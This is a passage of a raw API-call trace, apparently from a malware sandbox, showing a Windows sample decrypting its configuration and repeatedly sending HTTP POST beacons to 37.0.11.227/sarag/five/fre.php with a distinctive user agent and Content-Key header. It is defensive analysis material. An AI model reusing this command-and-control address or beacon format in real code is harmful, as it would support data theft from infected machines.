Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0228.298] recv (in: s=0x5c4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0228.376] GetProcessHeap () returned 0x690000 [0228.376] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0228.377] GetProcessHeap () returned 0x690000 [0228.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0228.377] GetProcessHeap () returned 0x690000 [0228.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0228.377] GetProcessHeap () returned 0x690000 [0228.378] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0228.378] closesocket (s=0x5c4) returned 0 [0228.379] GetProcessHeap () returned 0x690000 [0228.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0228.379] GetProcessHeap () returned 0x690000 [0228.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0228.380] GetProcessHeap () returned 0x690000 [0228.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0228.380] GetProcessHeap () returned 0x690000 [0228.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0228.381] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x6d4) returned 0x5c4 [0228.382] Sleep (dwMilliseconds=0xea60) [0228.384] GetProcessHeap () returned 0x690000 [0228.384] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0228.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.385] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.393] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0228.400] GetProcessHeap () returned 0x690000 [0228.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0228.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.404] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0228.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.406] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.407] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.407] GetProcessHeap () returned 0x690000 [0228.408] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0228.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.409] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0228.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.411] CryptDestroyKey (hKey=0x69d028) returned 1 [0228.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.412] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0228.412] GetProcessHeap () returned 0x690000 [0228.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0228.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.413] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0228.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.414] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0228.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.420] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0228.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.421] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0228.421] GetProcessHeap () returned 0x690000 [0228.421] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0228.421] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0228.422] GetProcessHeap () returned 0x690000 [0228.422] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0228.422] GetProcessHeap () returned 0x690000 [0228.422] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0228.425] GetProcessHeap () returned 0x690000 [0228.425] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0228.425] GetProcessHeap () returned 0x690000 [0228.425] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0228.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.427] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.432] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0228.441] GetProcessHeap () returned 0x690000 [0228.441] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0228.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.442] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0228.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.446] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.447] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.447] GetProcessHeap () returned 0x690000 [0228.448] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0228.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.449] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0228.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.450] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0228.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.451] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0228.451] GetProcessHeap () returned 0x690000 [0228.451] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0228.452] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.452] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0228.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.453] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0228.454] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.454] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0228.455] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.456] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0228.456] GetProcessHeap () returned 0x690000 [0228.456] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0228.456] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0228.456] GetProcessHeap () returned 0x690000 [0228.456] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0228.456] socket (af=2, type=1, protocol=6) returned 0x5c8 [0228.456] connect (s=0x5c8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0228.486] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0228.486] GetProcessHeap () returned 0x690000 [0228.486] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0228.486] GetProcessHeap () returned 0x690000 [0228.486] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0228.487] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0228.488] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0228.488] GetProcessHeap () returned 0x690000 [0228.488] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0228.488] GetProcessHeap () returned 0x690000 [0228.489] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0228.491] GetProcessHeap () returned 0x690000 [0228.491] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0228.491] GetProcessHeap () returned 0x690000 [0228.491] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0228.492] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0228.492] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0228.492] GetProcessHeap () returned 0x690000 [0228.493] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0228.493] GetProcessHeap () returned 0x690000 [0228.493] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0228.493] send (s=0x5c8, buf=0x6ad508*, len=242, flags=0) returned 242 [0228.493] send (s=0x5c8, buf=0x6aba40*, len=159, flags=0) returned 159 [0228.493] GetProcessHeap () returned 0x690000 [0228.494] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0228.494] recv (in: s=0x5c8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0228.579] GetProcessHeap () returned 0x690000 [0228.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0228.580] GetProcessHeap () returned 0x690000 [0228.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0228.580] GetProcessHeap () returned 0x690000 [0228.581] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0228.581] GetProcessHeap () returned 0x690000 [0228.581] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0228.581] closesocket (s=0x5c8) returned 0 [0228.582] GetProcessHeap () returned 0x690000 [0228.582] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0228.582] GetProcessHeap () returned 0x690000 [0228.582] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0228.582] GetProcessHeap () returned 0x690000 [0228.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0228.583] GetProcessHeap () returned 0x690000 [0228.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0228.584] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xbc0) returned 0x5c8 [0228.585] Sleep (dwMilliseconds=0xea60) [0228.586] GetProcessHeap () returned 0x690000 [0228.586] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0228.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.587] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.617] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0228.628] GetProcessHeap () returned 0x690000 [0228.628] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0228.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.637] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0228.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.638] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.639] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.639] GetProcessHeap () returned 0x690000 [0228.640] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0228.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.640] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0228.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.641] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0228.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.642] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0228.642] GetProcessHeap () returned 0x690000 [0228.642] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0228.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.645] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0228.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.646] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0228.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.647] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0228.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.648] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0228.648] GetProcessHeap () returned 0x690000 [0228.648] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0228.648] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0228.648] GetProcessHeap () returned 0x690000 [0228.649] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0228.649] GetProcessHeap () returned 0x690000 [0228.649] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0228.649] GetProcessHeap () returned 0x690000 [0228.650] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0228.650] GetProcessHeap () returned 0x690000 [0228.650] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0228.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.651] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.659] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0228.666] GetProcessHeap () returned 0x690000 [0228.666] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0228.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.667] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0228.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.668] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.669] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.670] GetProcessHeap () returned 0x690000 [0228.670] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0228.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.671] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0228.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.672] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0228.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.673] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0228.673] GetProcessHeap () returned 0x690000 [0228.673] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0228.674] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.675] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0228.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.676] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0228.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.679] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0228.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.681] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0228.681] GetProcessHeap () returned 0x690000 [0228.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0228.681] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0228.681] GetProcessHeap () returned 0x690000 [0228.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0228.681] socket (af=2, type=1, protocol=6) returned 0x5cc [0228.682] connect (s=0x5cc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0228.713] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0228.713] GetProcessHeap () returned 0x690000 [0228.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0228.714] GetProcessHeap () returned 0x690000 [0228.714] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0228.714] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0228.715] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0228.715] GetProcessHeap () returned 0x690000 [0228.715] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0228.715] GetProcessHeap () returned 0x690000 [0228.716] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0228.716] GetProcessHeap () returned 0x690000 [0228.716] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0228.716] GetProcessHeap () returned 0x690000 [0228.716] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0228.717] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0228.718] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0228.718] GetProcessHeap () returned 0x690000 [0228.718] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0228.718] GetProcessHeap () returned 0x690000 [0228.718] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0228.719] send (s=0x5cc, buf=0x6ad508*, len=242, flags=0) returned 242 [0228.719] send (s=0x5cc, buf=0x6aba40*, len=159, flags=0) returned 159 [0228.719] GetProcessHeap () returned 0x690000 [0228.719] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0228.719] recv (in: s=0x5cc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0228.799] GetProcessHeap () returned 0x690000 [0228.800] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0228.800] GetProcessHeap () returned 0x690000 [0228.800] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0228.800] GetProcessHeap () returned 0x690000 [0228.801] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0228.801] GetProcessHeap () returned 0x690000 [0228.801] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0228.802] closesocket (s=0x5cc) returned 0 [0228.802] GetProcessHeap () returned 0x690000 [0228.802] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0228.802] GetProcessHeap () returned 0x690000 [0228.803] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0228.803] GetProcessHeap () returned 0x690000 [0228.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0228.804] 